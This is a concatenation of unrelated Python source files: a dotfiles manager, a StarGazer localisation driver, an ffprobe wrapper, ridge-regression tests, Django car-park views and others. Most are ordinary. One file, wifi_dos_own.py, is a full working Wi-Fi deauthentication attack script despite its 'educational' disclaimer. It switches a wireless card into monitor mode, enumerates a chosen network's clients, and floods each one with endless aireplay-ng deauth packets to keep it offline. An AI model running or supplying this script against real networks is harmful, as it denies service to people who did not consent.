self.dst = self.options.get('dest_dir', None)
if not (os.path.isdir(self.src) and os.path.isdir(self.dst)):
raise Exception("BAD PATH: <Source: %s> <Dest: %s>" %
(self.src, self.dst))
# Process files which to not add a '.' to
_nodot = self.options.get('nodot', None)
if _nodot:
if "," in _nodot:
self.options['nodot_list'].extend(_nodot.split(','))
else:
self.options['nodot_list'].append(_nodot)
# Process regex for excluding files
_re_excludes = self.options.get('exclude', None)
if _re_excludes:
for _re_exclude in _re_excludes:
_re_exclude = _re_exclude.decode('string_escape')
re_exclude = re.compile(_re_exclude)
self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
#_re_exclude = self.options.get('exclude', None)
#if _re_exclude:
# _re_exclude = _re_exclude.decode('string_escape')
# re_exclude = re.compile(_re_exclude)
# self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
# Pre-process (cache) these files for quick access
#self.source_files = self._nodots(self._exclude(ls(self.src))()
self.source_files = self._exclude(ls(self.src))()
self.dest_files = ls(self.dst)
self.verbose = self.options.get('verbose')
self.interactive = self.options.get('interactive')
self.dry_run = self.options.get('dry_run')
if self.options.get('verbose', False):
pprint(self.options)
@property
def commands(self):
return filter(lambda method: method.startswith('cmd_'), dir(self))
def _nodots(self, l):
def map_func(x):
return x.lstrip('.') if x in self.options['nodot_list'] else x
return functools.partial(map, map_func, l)
def _exclude(self, l):
def filter_func(x):
return x not in [os.path.basename(a) for a in self.options['exclude_list']]
return functools.partial(filter, filter_func, l)
def _execute(self, cmd, func):
if self.dry_run:
self.verbose = True
self.func = None
if self.verbose:
print("# Execute: %s" % cmd)
if func:
func()
def run(self, command):
cmd = 'cmd_' + command
if hasattr(self, cmd):
func = getattr(self, cmd)
if callable(func):
try:
self._execute(cmd, func)
except Exception, e:
print(e)
#
# Commands API
#
def cmd_init(self):
""" Task to initialize dotfiles in your $HOME for the first time. """
print(">> Initing ...")
commands = ['update', 'diff', 'link']
for cmd in commands:
self.run(cmd)
def cmd_diff(self):
""" Show the differences between $DOTFILES and $HOME. """
print(">> Diffing ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
if not os.path.isdir(fromfile):
#to_file = os.path.join(self.options.get('dest_dir', from_file))
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
sys.stdout.writelines(diff(fromfile, tofile))
def cmd_link(self):
""" Link files in $DOTFILES to corresponding files in $HOME. """
print(">> Linking ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
nodeExists = os.path.lexists(tofile)
if nodeExists:
print("\nFile %s exists already!" % tofile)
if self.options.get('force', False):
if self.interactive:
if ask("Link %s->%s" % (fromfile, tofile)):
if self.verbose:
print("rm(%s)" % (tofile))
print("ln(%s, %s)" % (fromfile, tofile))
if os.path.islink(tofile):
unlink(tofile)
elif os.path.isdir(tofile):
shutil.rmtree(tofile)
ln(fromfile, tofile)
else:
rm(tofile)
ln(fromfile, tofile)
else:
if self.verbose:
print("rm(%s)" % (tofile))
print("ln(%s, %s)" % (fromfile, tofile))
rm(tofile)
ln(fromfile, tofile)
else:
if self.interactive:
if ask("Link %s->%s" % (fromfile, tofile)):
if self.verbose:
print("ln(%s, %s)" % (fromfile, tofile))
ln(fromfile, tofile)
else:
if self.verbose:
print("ln(%s, %s)" % (fromfile, tofile))
ln(fromfile, tofile)
def cmd_clean(self):
""" Clean the dotfiles in $HOME. """
print(">> Cleaning ...")
for from_file in self.source_files:
fromfile = os.path.join(self.options.get('source_dir'), from_file)
tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
if os.path.lexists(tofile):
if self.verbose:
print("rm(%s)" % tofile)
rm(tofile)
def cmd_update(self):
""" Update dotfiles and dependencies in $HOME with latest
in the repo(s). """
print(">> Updating ...")
cmd = "cd %s; git pull" % self.options.get('source_dir')
output = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT,
shell=True)
print(output)
def cmd_status(self):
""" Status of $DOTFILES. """
print(">> Status: ")
cmd = "cd %s; git status" % self.options.get('source_dir')
output = subprocess.check_output(
cmd,
stderr=subprocess.STDOUT,
shell=True)
print(output)
def run(commands, opts):
df = Dotfiles(opts)
if not opts['commands'] or opts['list_commands']:
for cmd in df.commands:
print(cmd.split("_")[1]+":")
docstring = getattr(getattr(df, cmd), '__doc__')
print(docstring)
else:
for command in commands:
df.run(command)
#
# main
#
def main(argv=None):
args = parse_args(argv)
run(args.commands, vars(args))
return 0 # success
if __name__ == '__main__':
status = main()
sys.exit(status)
| 2.390625 | 2 |
plot_log_population.py | catskillsresearch/openasr20 | 0 | 17689 | <filename>plot_log_population.py
import matplotlib.pylab as plt
def plot_log_population(population, _title, _xlabel, _ylabel, _bins):
plt.hist(population,bins=_bins)
plt.xlabel(_xlabel)
plt.ylabel(_ylabel)
plt.title(_title)
plt.yscale('log');
plt.show()
| 3 | 3 |
src/stargazer/stargazer.py | magazino/stargazer | 1 | 17690 | """
Driver class for Hagisonic Stargazer, with no ROS dependencies.
"""
from serial import Serial
from collections import deque
import re
import yaml
import time
import logging
import rospy
import numpy as np
from threading import Thread, Event
from tf import transformations
# STX: char that represents the start of a properly formed message
STX = '~'
# ETX: char that represents the end of a properly formed message
ETX = '`'
# DELIM: char that splits data
DELIM = '|'
# CMD: char that indicates command
CMD = '#'
# CMD: char that indicates command
RESPONSE = '!'
# RESULT: char that indicates that the message contains result data
RESULT = '^'
# NOTIFY: char that indicates a notification message of some kind
NOTIFY = '*'
class StarGazer(object):
def __init__(self, device, marker_map, callback_global=None, callback_local=None,callback_raw=None, callback_raw_reponse=None):
"""
Connect to a Hagisonic StarGazer device and receive poses.
device: The device location for the serial connection.
marker_map: dictionary of marker transforms, formatted:
{marker_id: (4,4) matrix}
callback_global: will be called whenever a new pose is received from the
Stargazer, will be called with (n,4,4) matrix of poses
of the location of the Stargazer in the global frame.
These are computed from marker_map.
callback_local: will be called whenever a new poses is received from the
Stargazer, with a dict: {marker_id: [xyz, angle]}
"""
self.device = device
self.marker_map = marker_map
self.connection = None
# chunk_size: how many characters to read from the serial bus in
# between checking the buffer for the STX/ETX characters
self._chunk_size = 80
self._callback_global = callback_global
self._callback_local = callback_local
self._callback_raw = callback_raw
self._callback_raw_reponse = callback_raw_reponse
self._stopped = Event()
self._thread = None
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
if self.is_connected:
self.disconnect()
@property
def is_connected(self):
"""
Returns whether the driver is currently connected to a serial port.
"""
return self.connection is not None
def connect(self):
"""
Connect to the StarGazer over the specified RS-232 port.
"""
if self.is_connected:
self.disconnect()
self.connection = Serial(port=self.device, baudrate=115200, timeout=1.0)
if self.connection is None:
return False
return True
def disconnect(self):
"""
Disconnects from the StarGazer and closes the RS-232 port.
"""
if self.is_connected:
self.connection.close()
self.connection = None
if self.connection is None:
return True
return False
@property
def is_streaming(self):
"""
Returns whether the driver is currently streaming pose data.
"""
return self._thread is not None
def start_streaming(self):
"""
Begin streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('CalcStart')
if success:
self._thread = Thread(target=self._read, args=()).start()
return success
def stop_streaming(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected
if self.is_streaming:
self._stopped.set()
self._thread.join()
success = self._send_command('CalcStop')
return success
def reset_parameters(self):
"""
Stop streaming pose data from the StarGazer.
"""
assert self.is_connected and not self.is_streaming
success = self._send_command('Reset')
return success
def set_parameter(self, name, value):
"""
Set a StarGazer configuration parameter.
This function can only be called while the StarGazer is
connected, but not streaming.
Arguments
---------
name: string name of the parameter to set
value: string value of the parameter to set
Example
-------
set_parameter('MarkType', 'HLD1L')
"""
assert self.is_connected and not self.is_streaming
success = self._send_command(name, value)
return success
def get_parameter(self, name):
pass
def _send_command(self, *args):
"""
Send a command to the StarGazer.
Arguments
---------
command: string, or list. If string of single command, send just that.
if list, reformat to add delimiter character
Example
-------
_send_command('CalcStop')
_send_command('MarkType', 'HLD1L')
"""
success = True
delimited = DELIM.join(str(i) for i in args)
if 'SetEnd' in delimited:
delimited = 'SetEnd'
command_str = STX + CMD + delimited + ETX
rospy.loginfo('Sending command to StarGazer: %s', command_str)
# The StarGazer requires a 50 ms delay between each byte.
for ch in command_str:
self.connection.write(ch)
time.sleep(0.05)
response_expected = STX + RESPONSE + delimited + ETX
success = self._read_response(response_expected)
if success and ('SetEnd' in response_expected):
response_expected = STX + RESPONSE + 'ParameterUpdate' + ETX
time.sleep(1.0)
success = self._read_response(response_expected)
if(success):
rospy.loginfo('Parameters update successful')
return success
def _read_response(self, response_expected):
success = True
try:
response_actual = self.connection.read(len(response_expected))
except Exception as e:
rospy.logwarn(str(e))
sucess = False
return success
# Scan for more incoming characters until we get a read timeout.
# (This is useful if there is still some incoming data from previous
# commands in intermediate serial buffers.)
while response_actual[-len(response_expected):] != response_expected:
c = None
try:
c = self.connection.read()
except Exception as e:
rospy.logwarn(str(e))
return success
if c:
# Add new characters to the response string.
response_actual += c
else:
rospy.logwarn('Received invalid response {%s} expected "{%s}'% \
(response_actual, response_expected))
success = False
break
'''
# If we run out of characters and still don't match, report
# the invalid response as an exception.
raise Exception(
'Command "{:s}" received invalid response "{:s}"; '
'expected "{:s}".'
.format(command_str, response_actual, response_expected)
)
'''
print response_actual
if self._callback_raw_reponse:
self._callback_raw_reponse(response_actual)
return success
def _read(self):
"""
Read from the serial connection to the StarGazer, process buffer,
then execute callbacks.
"""
# Compute a regular expression that returns the last valid
# message in a StarGazer stream.
msg_pattern = ('.*' + STX + '(?P<type>.)(?P<payload>.+)' + ETX +
'(?P<remainder>.*)$')
msg_matcher = re.compile(msg_pattern)
# Compute a regular expression that converts a StarGazer message
# into a list of tuples containing parsed groups.
delimiter = '\\' + DELIM
number = '[\d\+\-\.]'
tag_pattern = (r'(?P<id>\d+)' + delimiter +
r'(?P<yaw>' + number + '+)' + delimiter +
r'(?P<x>' + number + '+)' + delimiter +
r'(?P<y>' + number + '+)' + delimiter +
r'(?P<z>' + number + '+)')
tag_matcher = re.compile(tag_pattern)
def process_buffer(message_buffer):
"""
Looks at current message_buffer string for STX and ETX chars.
Proper behavior is to process string found between STX/ETX for poses
and remove everything in the buffer up the last observed ETX.
Valid readings:
~^148|-175.91|+98.74|+7.10|182.39`
~^248|-176.67|+98.38|+8.39|181.91|370|-178.41|-37.05|+8.97|179.51`
No valid readings:
~*DeadZone`
"""
# Look for a matching message, return the buffer if none are found.
message = msg_matcher.match(message_buffer)
if not message:
return message_buffer
if message.group('type') == RESULT:
markers = tag_matcher.finditer(message.group('payload'))
local_poses = {}
raw_poses = []
for marker in markers:
# Parse pose information for this marker.
_id = marker.group('id')
yaw = -np.radians(float(marker.group('yaw')))
x = 0.01 * float(marker.group('x'))
y = 0.01 * float(marker.group('y'))
# Note: this axis is negated.
z = 0.0#-0.01 * float(marker.group('z'))
raw_pose = [_id,x,y,0,-yaw]
raw_poses.append(raw_pose)
# Convert the pose to a transform and store it by ID.
marker_to_stargazer = fourdof_to_matrix((x, y, z), yaw)
local_poses[_id] = np.linalg.inv(marker_to_stargazer)
if self._callback_raw:
self._callback_raw(raw_poses)
if self._callback_local:
self._callback_local(local_poses)
if self._callback_global:
global_poses, unknown_ids = local_to_global(self.marker_map,
local_poses)
self._callback_global(global_poses, unknown_ids)
elif message.group('type') == NOTIFY:
# TODO: Report deadzone messages in here!
pass
else:
pass
# Return the rest of the message buffer.
return message.group('remainder')
rospy.loginfo('Entering read loop.')
message_buffer = ''
while not self._stopped.is_set() and self.connection:
try:
message_buffer += self.connection.read(self._chunk_size)
message_buffer = process_buffer(message_buffer)
except Exception as e:
rospy.logwarn('Error processing current buffer: %s (content: "%s")',
str(e), message_buffer
)
message_buffer = ''
break # For debugging purposes.
rospy.loginfo('Exited read loop.')
def close(self):
self._stopped.set()
self._send_command('CalcStop')
self.connection.close()
def local_to_global(marker_map, local_poses):
"""
Transform local marker coordinates to map coordinates.
"""
global_poses = dict()
unknown_ids = set()
for _id, pose in local_poses.iteritems():
if _id in marker_map:
marker_to_map = marker_map[_id]
local_to_marker = np.linalg.inv(pose)
local_to_map = np.dot(marker_to_map, local_to_marker)
global_poses[_id] = local_to_map
else:
unknown_ids.add(_id)
return global_poses, unknown_ids
def fourdof_to_matrix(translation, yaw):
"""
Convert from a Cartesian translation and yaw to a homogeneous transform.
"""
T = transformations.rotation_matrix(yaw, [0,0,1])
T[0:3,3] = translation
return T
def _callback_dummy(data):
return
def _callback_print(data):
print(data)
| 2.65625 | 3 |
example.py | karishmashuklaa/flatifyLists | 0 | 17691 | from flatifylists import flatifyList
example = [[[1,2], [3,[4,[5],6],7],8,9]]
print(flatifyList(example)) | 2.78125 | 3 |
pympeg/_probe.py | AP-Atul/pympeg | 5 | 17692 | <reponame>AP-Atul/pympeg<filename>pympeg/_probe.py
import os
import json
import subprocess
from ._exceptions import ProbeException
__all__ = ['probe']
def probe(filename, cmd='ffprobe', timeout=None):
"""Runs the ffprobe on the given file and outputs in json format """
if not os.path.isfile(filename):
raise FileExistsError(f"Input file {filename} does not exists.")
args = [cmd, '-show_format', '-show_streams', '-of', 'json']
args += [filename]
p = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
communicate_kwargs = dict()
if timeout is not None:
communicate_kwargs['timeout'] = timeout
out, err = p.communicate(**communicate_kwargs)
if p.returncode != 0:
raise ProbeException('ffprobe', out, err)
return json.loads(out.decode('utf-8'))
| 2.65625 | 3 |
example/func_doc.py | tinashime/Python27 | 0 | 17693 | def printMax(x,y):
'''prints the maximum of two numbers.
The two values must be integers.'''
x = int(x)
y = int(y)
if x > y:
print x,'is maximun'
else:
print y,'is maximum'
printMax(3,5)
print printMax.__doc__
| 4.15625 | 4 |
wifi_dos_own.py | Mr-Cracker-Pro/red-python-scripts | 1,353 | 17694 | <filename>wifi_dos_own.py
#!/usr/bin/env python3
# Disclaimer:
# This script is for educational purposes only.
# Do not use against any network that you don't own or have authorization to test.
#!/usr/bin/python3
# We will be using the csv module to work with the data captured by airodump-ng.
import csv
# If we move csv files to a backup directory we will use the datetime module to create
# to create a timestamp in the file name.
from datetime import datetime
# We will use the os module to get the current working directory and to list filenames in a directory.
import os
# We will use the regular expressions module to find wifi interface name, and also MAC Addresses.
import re
# We will use methods from the shutil module to move files.
import shutil
# We can use the subprocess module to run operating system commands.
import subprocess
# We will create a thread for each deauth sent to a MAC so that enough time doesn't elapse to allow a device back on the network.
import threading
# We use the sleep method in the menu.
import time
# Helper functions
def in_sudo_mode():
"""If the user doesn't run the program with super user privileges, don't allow them to continue."""
if not 'SUDO_UID' in os.environ.keys():
print("Try running this program with sudo.")
exit()
def find_nic():
"""This function is used to find the network interface controllers on your computer."""
# We use the subprocess.run to run the "sudo iw dev" command we'd normally run to find the network interfaces.
result = subprocess.run(["iw", "dev"], capture_output=True).stdout.decode()
network_interface_controllers = wlan_code.findall(result)
return network_interface_controllers
def set_monitor_mode(controller_name):
"""This function needs the network interface controller name to put it into monitor mode.
Argument: Network Controller Name"""
# Put WiFi controller into monitor mode.
# This is one way to put it into monitoring mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Killing conflicting processes makes sure that nothing interferes with putting controller into monitor mode.
subprocess.run(["airmon-ng", "check", "kill"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iw", wifi_name, "set", "monitor", "none"])
# Bring the WiFi controller back online.
subprocess.run(["ip", "link", "set", wifi_name, "up"])
def set_band_to_monitor(choice):
"""If you have a 5Ghz network interface controller you can use this function to put monitor either 2.4Ghz or 5Ghz bands or both."""
if choice == "0":
# Bands b and g are 2.4Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "bg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif choice == "1":
# Band a is for 5Ghz WiFi Networks
subprocess.Popen(["airodump-ng", "--band", "a", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
# Will use bands a, b and g (actually band n). Checks full spectrum.
subprocess.Popen(["airodump-ng", "--band", "abg", "-w", "file", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def backup_csv():
"""Move all .csv files in the directory to a new backup folder."""
for file_name in os.listdir():
# We should only have one csv file as we delete them from the folder every time we run the program.
if ".csv" in file_name:
print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
# We get the current working directory.
directory = os.getcwd()
try:
# We make a new directory called /backup
os.mkdir(directory + "/backup/")
except:
print("Backup folder exists.")
# Create a timestamp
timestamp = datetime.now()
# We copy any .csv files in the folder to the backup folder.
shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
def check_for_essid(essid, lst):
"""Will check if there is an ESSID in the list and then send False to end the loop."""
check_status = True
# If no ESSIDs in list add the row
if len(lst) == 0:
return check_status
# This will only run if there are wireless access points in the list.
for item in lst:
# If True don't add to list. False will add it to list
if essid in item["ESSID"]:
check_status = False
return check_status
def wifi_networks_menu():
""" Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c."""
active_wireless_networks = list()
try:
while True:
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
if ".csv" in file_name:
with open(file_name) as csv_h:
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for row in csv_reader:
if row["BSSID"] == "BSSID":
pass
elif row["BSSID"] == "Station MAC":
break
elif check_for_essid(row["ESSID"], active_wireless_networks):
active_wireless_networks.append(row)
print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
print("No |\tBSSID |\tChannel|\tESSID |")
print("___|\t___________________|\t_______|\t______________________________|")
for index, item in enumerate(active_wireless_networks):
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
# We make the script sleep for 1 second before loading the updated list.
time.sleep(1)
except KeyboardInterrupt:
print("\nReady to make choice.")
# Ensure that the input choice is valid.
while True:
net_choice = input("Please select a choice from above: ")
if active_wireless_networks[int(net_choice)]:
return active_wireless_networks[int(net_choice)]
print("Please try again.")
def set_into_managed_mode(wifi_name):
"""SET YOUR NETWORK CONTROLLER INTERFACE INTO MANAGED MODE & RESTART NETWORK MANAGER
ARGUMENTS: wifi interface name
"""
# Put WiFi controller into monitor mode.
# This is one way to put it into managed mode. You can also use iwconfig, or airmon-ng.
subprocess.run(["ip", "link", "set", wifi_name, "down"])
# Put the WiFi nic in monitor mode.
subprocess.run(["iwconfig", wifi_name, "mode", "managed"])
subprocess.run(["ip", "link", "set", wifi_name, "up"])
subprocess.run(["service", "NetworkManager", "start"])
def get_clients(hackbssid, hackchannel, wifi_name):
subprocess.Popen(["airodump-ng", "--bssid", hackbssid, "--channel", hackchannel, "-w", "clients", "--write-interval", "1", "--output-format", "csv", wifi_name], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def deauth_attack(network_mac, target_mac, interface):
# We are using aireplay-ng to send a deauth packet. 0 means it will send it indefinitely. -a is used to specify the MAC address of the target router. -c is used to specify the mac we want to send the deauth packet.
# Then we also need to specify the interface
subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", network_mac, "-c", target_mac, interface])
# Regular Expressions to be used.
mac_address_regex = re.compile(r'(?:[0-9a-fA-F]:?){12}')
wlan_code = re.compile("Interface (wlan[0-9]+)")
# Program Header
# Basic user interface header
print(r"""______ _ _ ______ _ _
| _ \ (_) | | | ___ \ | | | |
| | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
| | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
| |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
|___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
print("\n****************************************************************")
print("\n* Copyright of <NAME>, 2021 *")
print("\n* https://www.davidbombal.com *")
print("\n* https://www.youtube.com/davidbombal *")
print("\n****************************************************************")
# In Sudo Mode?
in_sudo_mode()
# Move any csv files to current working directory/backup
backup_csv()
# Lists to be populated
macs_not_to_kick_off = list()
# Menu to request Mac Addresses to be kept on network.
while True:
print("Please enter the MAC Address(es) of the device(s) you don't want to kick off the network.")
macs = input("Please use a comma separated list if more than one, ie 00:11:22:33:44:55,11:22:33:44:55:66 :")
# Use the MAC Address Regex to find all the MAC Addresses entered in the above input.
macs_not_to_kick_off = mac_address_regex.findall(macs)
# We reassign all the MAC address to the same variable as a list and make them uppercase using a list comprehension.
macs_not_to_kick_off = [mac.upper() for mac in macs_not_to_kick_off]
# If you entered a valid MAC Address the program flow will continue and break out of the while loop.
if len(macs_not_to_kick_off) > 0:
break
print("You didn't enter valid Mac Addresses.")
# Menu to ask which bands to scan with airmon-ng
while True:
wifi_controller_bands = ["bg (2.4Ghz)", "a (5Ghz)", "abg (Will be slower)"]
print("Please select the type of scan you want to run.")
for index, controller in enumerate(wifi_controller_bands):
print(f"{index} - {controller}")
# Check if the choice exists. If it doesn't it asks the user to try again.
# We don't cast it to an integer at this stage as characters other than digits will cause the program to break.
band_choice = input("Please select the bands you want to scan from the list above: ")
try:
if wifi_controller_bands[int(band_choice)]:
# Since the choice exists and is an integer we can cast band choice as an integer.
band_choice = int(band_choice)
break
except:
print("Please make a valid selection.")
# Find all the network interface controllers.
network_controllers = find_nic()
if len(network_controllers) == 0:
# If no networks interface controllers connected to your computer the program will exit.
print("Please connect a network interface controller and try again!")
exit()
# Select the network interface controller you want to put into monitor mode.
while True:
for index, controller in enumerate(network_controllers):
print(f"{index} - {controller}")
controller_choice = input("Please select the controller you want to put into monitor mode: ")
try:
if network_controllers[int(controller_choice)]:
break
except:
print("Please make a valid selection!")
# Assign the network interface controller name to a variable for easy use.
wifi_name = network_controllers[int(controller_choice)]
# Set network interface controller to monitor mode.
set_monitor_mode(wifi_name)
# Monitor the selected wifi band(s).
set_band_to_monitor(band_choice)
# Print WiFi Menu
wifi_network_choice = wifi_networks_menu()
hackbssid = wifi_network_choice["BSSID"]
# We strip out all the extra white space to just get the channel.
hackchannel = wifi_network_choice["channel"].strip()
# backup_csv()
# Run against only the network we want to kick clients off.
get_clients(hackbssid, hackchannel, wifi_name)
# We define a set, because it can only hold unique values.
active_clients = set()
# We would like to know the threads we've already started so that we don't start multiple threads running the same deauth.
threads_started = []
# Make sure that airmon-ng is running on the correct channel.
subprocess.run(["airmon-ng", "start", wifi_name, hackchannel])
try:
while True:
count = 0
# We want to clear the screen before we print the network interfaces.
subprocess.call("clear", shell=True)
for file_name in os.listdir():
# We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
# The following list contains the field names for the csv entries.
fieldnames = ["Station MAC", "First time seen", "Last time seen", "Power", "packets", "BSSID", "Probed ESSIDs"]
if ".csv" in file_name and file_name.startswith("clients"):
with open(file_name) as csv_h:
print("Running")
# We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
# This creates a list of dictionaries with the keys as specified in the fieldnames.
csv_h.seek(0)
csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
for index, row in enumerate(csv_reader):
if index < 5:
pass
# We will not add the MAC Addresses we specified at the beginning of the program to the ones we will kick off.
elif row["Station MAC"] in macs_not_to_kick_off:
pass
else:
# Add all the active MAC Addresses.
active_clients.add(row["Station MAC"])
print("Station MAC |")
print("______________________|")
for item in active_clients:
# We're using the print statement with an f-string.
# F-strings are a more intuitive way to include variables when printing strings,
# rather than ugly concatenations.
print(f"{item}")
# Once a device is in the active clients set and not one of the threads running deauth attacks we start a new thread as a deauth attack.
if item not in threads_started:
# It's easier to work with the unique MAC Addresses in a list and add the MAC to the list of threads we started before we start running the deauth thread.
threads_started.append(item)
# We run the deauth_attack function in the thread with the argumenets hackbssid, item and wifi_name, we also specify it as a background daemon thread.
# A daemon thread keeps running until the main thread stops. You can stop the main thread with ctrl + c.
t = threading.Thread(target=deauth_attack, args=[hackbssid, item, wifi_name], daemon=True)
t.start()
except KeyboardInterrupt:
print("\nStopping Deauth")
# Set the network interface controller back into managed mode and restart network services.
set_into_managed_mode(wifi_name)
| 2.96875 | 3 |
lightwood/mixers/helpers/debugging.py | ritwik12/lightwood | 0 | 17695 | <reponame>ritwik12/lightwood
import subprocess
def get_gpu_memory_map():
'''
Keys are device ids as integers.
Values are memory usage as integers in MB.
'''
result = subprocess.check_output(
[
'nvidia-smi', '--query-gpu=memory.used',
'--format=csv,nounits,noheader'
], encoding='utf-8')
# Convert lines into a dictionary
gpu_memory = [int(x) for x in result.strip().split('\n')]
gpu_memory_map = dict(zip(range(len(gpu_memory)), gpu_memory))
return gpu_memory_map
def print_gpuutil_status():
import GPUtil
GPUtil.showUtilization()
| 3.015625 | 3 |
optimization/prac1/tests/test_ridge.py | shaandesai1/AIMS | 0 | 17696 | import unittest
from sys import argv
import numpy as np
import torch
from objective.ridge import Ridge, Ridge_ClosedForm, Ridge_Gradient
from .utils import Container, assert_all_close, assert_all_close_dict
def _init_ridge(cls):
np.random.seed(1234)
torch.manual_seed(1234)
n_features = 3
n_samples = 5
mu = 0.02
cls.hparams = Container(n_features=n_features,
n_samples=n_samples,
mu=mu)
cls.w = torch.randn(n_features, 1, requires_grad=True)
cls.x = torch.randn(n_samples, n_features)
cls.y = torch.randn(n_samples)
class TestObj_Ridge_ClosedForm(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_ClosedForm(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'sol': torch.tensor([[-0.2297], [-0.7944], [-0.5806]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
class TestObj_Ridge_Gradient(unittest.TestCase):
def setUp(self):
_init_ridge(self)
self.obj = Ridge_Gradient(self.hparams)
def test_error(self):
error_test = self.obj.task_error(self.w, self.x, self.y)
error_ref = torch.tensor(1.3251)
assert_all_close(error_test, error_ref, "task_error returned value")
def test_oracle(self):
oracle_info_test = self.obj.oracle(self.w, self.x, self.y)
oracle_info_ref = {
'dw': torch.tensor([[0.7323], [1.4816], [-0.3771]]),
'obj': torch.tensor(1.3370)}
assert_all_close_dict(oracle_info_ref, oracle_info_test, "oracle_info")
if __name__ == '__main__':
unittest.main(argv=argv)
| 2.5625 | 3 |
app/parking/views.py | zollf/CITS3200 | 0 | 17697 | <filename>app/parking/views.py
from django.shortcuts import redirect
from django.http.response import JsonResponse
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework import status
from rest_framework.parsers import JSONParser
from .models import CarPark, CarBay
from app.authentication.models import User
from .serializers import *
from ..emails.send import log_and_send_mail
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carparks_list(request):
if request.method == 'GET':
data = CarPark.objects.all()
serializer = CarParkSerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if 'pk' in request.data:
carpark = CarPark.objects.get(pk=request.data['pk'])
serializer = CarParkSerializer(carpark, data=request.data)
else:
serializer = CarParkSerializer(data=request.data)
if not serializer.is_valid():
if 'redirect' in request.data:
errors = [str(error[1][0]).replace("this field", error[0]) for error in serializer.errors.items()]
if 'pk' in request.data:
request.session["edit_carpark_errors"] = errors
return redirect(f"/admin/carparks/view/{request.data.get('pk', '')}")
else:
request.session["new_carpark_errors"] = errors
return redirect(f"/admin/carparks/add")
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
serializer.save()
if 'redirect' in request.data:
return redirect(request.data['redirect'])
return JsonResponse(serializer.data, status=status.HTTP_201_CREATED)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'PUT', 'DELETE'])
def carpark_detail(request, pk):
try:
carpark = CarPark.objects.get(pk=pk)
except CarPark.DoesNotExist:
return HttpResponse(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = CarParkSerializer(carpark)
return JsonResponse(serializer.data)
elif request.method == 'PUT':
carpark_data = JSONParser().parse(request)
serializer = CarParkSerializer(carpark, data=carpark_data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
return JsonResponse(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
elif request.method == 'DELETE':
carpark.delete()
return HttpResponse(status=status.HTTP_204_NO_CONTENT)
@login_required(login_url="/login")
@csrf_protect
@api_view(['GET', 'POST'])
def carbay_list(request):
if request.method == 'GET':
data = CarBay.objects.all()
serializer = CarBaySerializer(data, context={'request': request}, many=True)
return Response(serializer.data)
elif request.method == 'POST':
if 'pk' in request.data:
